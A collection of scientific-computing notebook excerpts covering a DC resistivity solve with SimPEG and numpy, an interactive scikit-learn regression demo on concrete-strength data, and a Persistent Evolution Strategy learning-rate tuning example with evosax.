mesh.faceDiv??
# Assemble and solve the DC resistivity problem
Div = mesh.faceDiv
Sigma = mesh.getFaceInnerProduct(sigma, invProp=True, invMat=True)
Vol = Utils.sdiag(mesh.vol)
# assemble the system matrix
A = Vol * Div * Sigma * Div.T * Vol
# right hand side
q = np.zeros(mesh.nC)
q[source_loc_inds] = np.r_[+1, -1]
from SimPEG import Solver # import the default solver (LU)
# solve the DC resistivity problem
Ainv = Solver(A) # create a matrix that behaves like A inverse
phi = Ainv * q
# look at the results!
plt.colorbar(mesh.plotImage(phi)[0])
plt.title(r'Electric Potential, $\phi$');
```
## What just happened!?
In the notebooks that follow, we will
- define where variables live on the mesh ([mesh.ipynb](mesh.ipynb))
- define the discrete divergence ([divergence.ipynb](divergence.ipynb))
- use the weak formulation to define a solveable system of equations ([weakformulation.ipynb](weakformulation.ipynb))
- solve and play with the DC resistivity equations ([all_together_now.ipynb](all_together_now.ipynb))
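Before moving on, it can help to see the same pattern without SimPEG. Below is a minimal 1D sketch of the equation we just solved, $-\nabla\cdot(\sigma\nabla\phi) = q$, discretized by hand in plain numpy with zero-potential (Dirichlet) boundaries. This is a toy illustration only, not SimPEG's actual mimetic finite-volume discretization:

```python
import numpy as np

def solve_dc_1d(sigma, q, h):
    """Solve -d/dx(sigma dphi/dx) = q on n cells of width h,
    with phi = 0 at both boundaries (dense solve; toy sketch only)."""
    n = len(sigma)
    A = np.zeros((n, n))
    # harmonic average of sigma on the n-1 interior faces
    sig_f = 2.0 * sigma[:-1] * sigma[1:] / (sigma[:-1] + sigma[1:])
    for i in range(n - 1):  # assemble interior face conductances
        c = sig_f[i] / h**2
        A[i, i] += c
        A[i + 1, i + 1] += c
        A[i, i + 1] -= c
        A[i + 1, i] -= c
    # Dirichlet boundaries: half-cell distance to the boundary faces
    A[0, 0] += 2.0 * sigma[0] / h**2
    A[-1, -1] += 2.0 * sigma[-1] / h**2
    return np.linalg.solve(A, q)

# a dipole source in a uniform medium
n = 50
sigma = np.ones(n)
q = np.zeros(n)
q[12], q[37] = +1.0, -1.0  # a- and b-electrodes
phi = solve_dc_1d(sigma, q, h=1.0 / n)
```

As in the 2D result above, the potential is positive near the current injection and negative near the return electrode.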
# Predictive models
A set of supporting code snippets for the presentation.
### Plant energy output dataset
Example datasets:
- `plant.csv`: records of the energy output of an electricity generator with respect to different operating parameters.
- `concrete.csv`: records of concrete strength with respect to curing time and the amount of cement in the mixture.
```
import plotly.offline as py
import plotly.graph_objs as go
py.init_notebook_mode(True)
import numpy as np
import pandas as ps
csv = ps.read_csv('concrete.csv')
XY = csv.to_numpy()
X, y = XY[:, (0, 1)], XY[:, -1]
data = [
go.Scatter3d(
x = X[:,0], y = X[:,1], z = y,
mode='markers', marker={'size': 3})
]
layout = go.Layout(
title='Dataset',
autosize=True,
margin=dict(l=65,r=50,b=65,t=90),
    scene=dict(
xaxis=dict(title=csv.columns[0]),
yaxis=dict(title=csv.columns[1]),
zaxis=dict(title=csv.columns[-1]),
)
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig)
import numpy as np
import pandas as ps
from time import time
# Choice of models inspired by
# https://arxiv.org/pdf/1708.05070.pdf
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.svm import SVR, LinearSVR
from sklearn.neighbors import KNeighborsRegressor
from sklearn.ensemble import ExtraTreesRegressor
from sklearn.tree import DecisionTreeRegressor
from sklearn.preprocessing import RobustScaler
from sklearn.pipeline import Pipeline
from sklearn.model_selection import GridSearchCV, train_test_split
def render_model(model, X, y):
"""Evaluates model on the domain of a dataset"""
resolution = 37
X1 = np.linspace(min(X[:, 0]), max(X[:, 0]), resolution)
X2 = np.linspace(min(X[:, 1]), max(X[:, 1]), resolution)
X1, X2 = np.meshgrid(X1, X2)
Z = X1 * 0.0
for i in range(X1.shape[0]):
for j in range(X1.shape[1]):
Z[i,j] = model.predict([[X1[i,j], X2[i,j]]])[0]
return X1, X2, Z
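# A vectorized alternative to `render_model` (a sketch assuming the same
# two-feature grid setup): one batched predict call replaces the nested
# per-point loop above and is typically much faster.
def render_model_vectorized(model, X, resolution=37):
    """Evaluate `model` on a grid spanning the range of the first two features."""
    X1 = np.linspace(X[:, 0].min(), X[:, 0].max(), resolution)
    X2 = np.linspace(X[:, 1].min(), X[:, 1].max(), resolution)
    X1, X2 = np.meshgrid(X1, X2)
    Z = np.asarray(model.predict(np.c_[X1.ravel(), X2.ravel()])).reshape(X1.shape)
    return X1, X2, Z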
# rendering function
def fnc(model_class='lin', C=1.0, gamma=1.0, n_neighbors=1,
n_estimators=10, max_depth=1, min_samples_split=0.5,
learning_rate=0.01):
# parameters for different model classes
lin = {
'model': [LinearSVR(max_iter=100000)],
'model__C': [10 ** C],
}
knn = {
'model': [KNeighborsRegressor()],
'model__n_neighbors': [n_neighbors],
}
svr = {
'model': [SVR(epsilon=10.0)],
'model__C': [10 ** C],
'model__gamma': [10.0 ** gamma],
}
tree = {
'model': [DecisionTreeRegressor()],
'model__max_depth': [max_depth],
'model__min_samples_split': [min_samples_split],
}
gbrt = {
'model': [GradientBoostingRegressor()],
'model__n_estimators': [n_estimators],
'model__learning_rate': [10 ** learning_rate],
}
model = {'lin': lin, 'knn': knn, 'svm': svr, 'gbrt': gbrt, 'tree': tree}[model_class]
if model_class == 'tree' or model_class == 'lin':
pipe = Pipeline([
('model', GradientBoostingRegressor()),
])
else:
pipe = Pipeline([
('scale', RobustScaler()),
('model', GradientBoostingRegressor()),
])
model = GridSearchCV(
estimator=pipe,
param_grid=[model],
n_jobs=-1,
)
# read data
csv = ps.read_csv('concrete.csv')
    XY = csv.to_numpy()
# split data into inputs and outputs
X, y = XY[:, :-1], XY[:, -1]
# split data into training and testing data
X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.75)
start_time = time()
# search for best hyperparameters
model.fit(X_train, y_train)
# evaluate model
fitting_time = time() - start_time
train_score = model.best_score_
test_score = model.score(X_test, y_test)
print("Model fit time: %s, val. score: %s, test score: %s" % (fitting_time, train_score, test_score))
# rendering code
Xp, Yp, Zp = render_model(model, X, y)
import plotly.offline as py
import plotly.graph_objs as go
py.init_notebook_mode(True)
data = [
go.Scatter3d(
x=X[:, 0], y=X[:, 1], z=y,
mode='markers', marker={'size': 1}),
go.Surface(
x=Xp, y=Yp, z=Zp
)
]
if model_class == 'svm':
        # get the trained SVR model from the pipeline
svm_model = model.best_estimator_.steps[-1][-1]
        # indices of the support vectors, to highlight them in the plot
I = svm_model.support_
data.append(
go.Scatter3d(
x=X_train[I, 0], y=X_train[I, 1], z=y_train[I],
mode='markers', marker={'size': 3}),
)
# 3d rendering done here using plot.ly
layout = go.Layout(
title=model_class,
autosize=True,
margin=dict(l=1, r=1, b=40, t=30),
        scene=dict(
xaxis=dict(title=csv.columns[0]),
yaxis=dict(title=csv.columns[1]),
zaxis=dict(title=csv.columns[-1]),
)
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig)
#py.plot(fig)
if model_class == 'lin':
# get the trained linear model
lin_model = model.best_estimator_.steps[-1][-1]
# print the weights of the model
print('Model weights: %s' % dict(zip(csv.columns[:2], lin_model.coef_)))
if model_class == 'svm':
        # get the trained SVR model from the pipeline
svm_model = model.best_estimator_.steps[-1][-1]
        # print the number of support vectors
print('Support vectors: %s' % len(svm_model.support_))
if model_class == 'tree':
# tree rendering done here
tree_model = model.best_estimator_.steps[-1][-1]
import graphviz
from sklearn import tree
from IPython.core.display import display
dot_data = tree.export_graphviz(tree_model, out_file=None,
feature_names=csv.columns[:2], label='all',
filled=True, rounded=True, impurity=False,
special_characters=True)
graph = graphviz.Source(dot_data)
display(graph)
# ignore warnings for clean output
import warnings
warnings.filterwarnings('ignore')
# interactive part done here
from ipywidgets import interact, interactive, fixed, interact_manual
import ipywidgets as widgets
from ipywidgets import FloatSlider, IntSlider
# shorthand definitions of sliders
fr=lambda x, y: FloatSlider(min=x, max=y, continuous_update=False)
ir=lambda x, y: IntSlider(min=x, max=y, continuous_update=False)
# all interactive cell outputs
interact(lambda C: fnc('lin', C=C), C=fr(-6,5));
interact(lambda n_neighbors: fnc('knn', n_neighbors=n_neighbors),
n_neighbors=ir(1,100));
interact(lambda C, gamma: fnc('svm', C=C, gamma=gamma),
C=fr(-3,4), gamma=fr(-3, 4));
interact(lambda max_depth, min_samples_split: fnc('tree', max_depth=max_depth, min_samples_split=min_samples_split),
max_depth=ir(1,16), min_samples_split=fr(0.01, 1.0));
interact(lambda n_estimators, learning_rate: fnc('gbrt', n_estimators=n_estimators, learning_rate=learning_rate),
n_estimators=ir(1,100), learning_rate=fr(-4, 4));
```
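The `GridSearchCV` call above automates a simple pattern: fit the model once per hyperparameter setting, score each fit on held-out data, and keep the best. Here is a pure-numpy sketch of that search loop using closed-form ridge regression as the model (an illustration of the pattern only, not sklearn's implementation, which additionally cross-validates):

```python
import numpy as np

def ridge_fit(X, y, alpha):
    """Closed-form ridge regression weights."""
    return np.linalg.solve(X.T @ X + alpha * np.eye(X.shape[1]), X.T @ y)

def grid_search_ridge(X_tr, y_tr, X_val, y_val, alphas):
    """Fit once per alpha, score on the holdout, keep the best."""
    best_mse, best_alpha, best_w = np.inf, None, None
    for alpha in alphas:
        w = ridge_fit(X_tr, y_tr, alpha)
        mse = np.mean((X_val @ w - y_val) ** 2)
        if mse < best_mse:
            best_mse, best_alpha, best_w = mse, alpha, w
    return best_mse, best_alpha, best_w

# noiseless synthetic data: the smallest penalty should win
rng = np.random.default_rng(0)
X = rng.normal(size=(200, 3))
y = X @ np.array([1.0, -2.0, 0.5])
best_mse, best_alpha, best_w = grid_search_ridge(
    X[:150], y[:150], X[150:], y[150:], alphas=[1e-6, 1e-2, 10.0])
```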
# 04 - Persistent ES on Learning Rate Tuning Problem
### Last Update: March 2022 ([Open in Colab](https://colab.research.google.com/github/RobertTLange/evosax/blob/main/examples/04_mlp_pes.ipynb))
```
%matplotlib inline
%load_ext autoreload
%autoreload 2
%config InlineBackend.figure_format = 'retina'
!pip install git+https://github.com/RobertTLange/evosax.git@main
```
## Problem as in [Vicol et al. (2021)](http://proceedings.mlr.press/v139/vicol21a/vicol21a-supp.pdf) - Toy 2D Regression
```
import jax
import jax.numpy as jnp
from functools import partial
def loss(x):
"""Inner loss."""
return (
jnp.sqrt(x[0] ** 2 + 5)
- jnp.sqrt(5)
+ jnp.sin(x[1]) ** 2 * jnp.exp(-5 * x[0] ** 2)
+ 0.25 * jnp.abs(x[1] - 100)
)
def update(state, i):
"""Performs a single inner problem update, e.g., a single unroll step."""
(L, x, theta, t_curr, T, K) = state
lr = jnp.exp(theta[0]) * (T - t_curr) / T + jnp.exp(theta[1]) * t_curr / T
x = x - lr * jax.grad(loss)(x)
L += loss(x) * (t_curr < T)
t_curr += 1
return (L, x, theta, t_curr, T, K), x
@partial(jax.jit, static_argnums=(3, 4))
def unroll(x_init, theta, t0, T, K):
"""Unroll the inner problem for K steps."""
L = 0.0
initial_state = (L, x_init, theta, t0, T, K)
state, outputs = jax.lax.scan(update, initial_state, None, length=K)
(L, x_curr, theta, t_curr, T, K) = state
return L, x_curr
```
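One detail worth pulling out of `update` above: the learning rate is a linear interpolation, in inner-problem time, between two endpoints that `theta` parameterizes on a log scale. A standalone numpy sketch of that schedule:

```python
import numpy as np

def lr_schedule(theta, t, T):
    """Linearly interpolate (in inner time t) between exp(theta[0])
    at t=0 and exp(theta[1]) at t=T, as in `update` above."""
    return np.exp(theta[0]) * (T - t) / T + np.exp(theta[1]) * t / T

theta = np.array([np.log(0.1), np.log(0.001)])
start = lr_schedule(theta, 0, 100)   # 0.1
end = lr_schedule(theta, 100, 100)   # 0.001
mid = lr_schedule(theta, 50, 100)    # halfway: 0.0505
```

Parameterizing the endpoints on a log scale keeps the learning rate positive regardless of what values the outer optimizer proposes for `theta`.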
### Initialize Persistent Evolution Strategy
```
from evosax import PersistentES
popsize = 100
T = 100
K = 10
strategy = PersistentES(popsize=popsize, num_dims=2)
es_params = strategy.default_params
es_params["T"] = T  # total inner problem length
es_params["K"] = K  # truncation length of each unroll
rng = jax.random.PRNGKey(5)
state = strategy.initialize(rng, es_params)
# Initialize inner parameters
t = 0
xs = jnp.ones((popsize, 2)) * jnp.array([1.0, 1.0])
```
### Run Outer PES Loop of Inner GD Loops :)
```
for i in range(5000):
rng, skey = jax.random.split(rng)
if t >= es_params["T"]:
# Reset the inner problem: iteration, parameters
t = 0
xs = jnp.ones((popsize, 2)) * jnp.array([1.0, 1.0])
    x, state = strategy.ask(skey, state, es_params)
# Unroll inner problem for K steps using antithetic perturbations
fitness, xs = jax.vmap(unroll, in_axes=(0, 0, None, None, None))(
xs, x, t, es_params["T"], es_params["K"]
)
# Update ES - outer step!
state = strategy.tell(x, fitness, state, es_params)
t += es_params["K"]
# Evaluation!
if i % 500 == 0:
L, _ = unroll(
jnp.array([1.0, 1.0]), state["mean"], 0, es_params["T"], es_params["T"]
)
print(i, state["mean"], L)
```
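For intuition about what `ask`/`tell` are doing: Persistent ES builds on antithetic evolution-strategy gradient estimates, with extra bookkeeping to accumulate perturbations across truncated unrolls. A simplified numpy sketch of the *vanilla* antithetic ES estimator (not evosax's actual PES update, which is more involved):

```python
import numpy as np

def es_grad(f, theta, sigma=0.01, n_pairs=5000, seed=0):
    """Antithetic evolution-strategy estimate of grad f at theta.
    Each pair evaluates f at theta +/- sigma*eps and weights the
    fitness difference by the perturbation direction eps."""
    rng = np.random.default_rng(seed)
    g = np.zeros_like(theta)
    for _ in range(n_pairs):
        eps = rng.normal(size=theta.shape)
        g += (f(theta + sigma * eps) - f(theta - sigma * eps)) * eps
    return g / (2.0 * sigma * n_pairs)

# sanity check on a quadratic: the true gradient at [1, -2] is [2, -4]
f = lambda x: np.sum(x ** 2)
g = es_grad(f, np.array([1.0, -2.0]))
```

The estimate only needs fitness evaluations, never `jax.grad` of the unroll, which is what makes ES attractive for long or chaotic inner problems.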